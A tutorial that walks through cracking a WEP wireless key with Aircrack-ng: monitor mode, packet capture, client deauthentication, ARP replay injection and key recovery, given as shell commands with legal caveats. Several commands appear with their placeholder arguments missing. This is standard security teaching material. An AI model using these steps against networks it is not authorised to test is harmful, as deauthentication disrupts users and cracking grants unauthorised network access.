TL;DR
This guide shows you how to crack a WEP key using ARP replay attacks within the Aircrack-ng suite. It’s an older method, but useful for understanding WEP vulnerabilities and practicing cyber security skills in a controlled environment.
Prerequisites
- A wireless network interface card (NIC) that supports monitor mode and packet injection.
- The Aircrack-ng suite installed on your Linux system (Kali Linux is recommended).
- Root privileges (sudo access).
- A target WEP network. Important: Only test this on networks you own or have explicit permission to assess.
Steps
- Put your wireless interface into monitor mode. This allows it to capture all wireless traffic, not just packets addressed to it.
sudo airmon-ng start wlan0This will usually create a new interface like wlan0mon. Use this interface for the following steps.
- Identify your target network. Use Airodump-ng to scan for nearby wireless networks and find the BSSID (MAC address) of your target WEP network.
sudo airodump-ng wlan0monNote down the BSSID, channel number, and ESSID (network name).
- Capture traffic on the target network. Airodump-ng will capture packets from the specified channel.
sudo airodump-ng -c--bssid wlan0mon -w capture Replace <channel_number> and <BSSID> with the values you noted in step 2. The
-w captureoption saves the captured packets to files starting with ‘capture’. - Deauthenticate a client (optional, but speeds up the process). Sending deauthentication packets forces clients to reconnect, generating more traffic.
sudo aireplay-ng -0 1 -a-c wlan0mon Replace <BSSID> with the target network’s BSSID and <client_MAC_address> with a client connected to that network (found in Airodump-ng output). Repeat this several times.
- Perform an ARP replay attack. This sends spoofed ARP requests, generating more IVs (Initialisation Vectors) which are needed for cracking the key.
sudo aireplay-ng -3 -b-h wlan0mon Replace <BSSID> with the target network’s BSSID and <client_MAC_address> with a client MAC address. Let this run for several minutes, or until you have enough IVs (at least 20,000-50,000 is recommended).
- Crack the WEP key. Use Aircrack-ng to attempt to crack the captured packets.
sudo aircrack-ng capture*.capAircrack-ng will analyze the .cap files and attempt to recover the WEP key. If successful, it will display the key in various formats (hexadecimal, ASCII).
- Stop monitor mode. Once you’ve finished capturing traffic.
sudo airmon-ng stop wlan0mon
Important Considerations
- Legal implications: Cracking WEP keys without permission is illegal. This guide is for educational purposes only.
- WEP is outdated: WEP is very insecure and easily cracked. Modern networks should use WPA2 or WPA3 encryption.
- IVs are key: The more IVs you capture, the higher your chances of successfully cracking the key.
- Client activity: More active clients on the network will generate more traffic and IVs.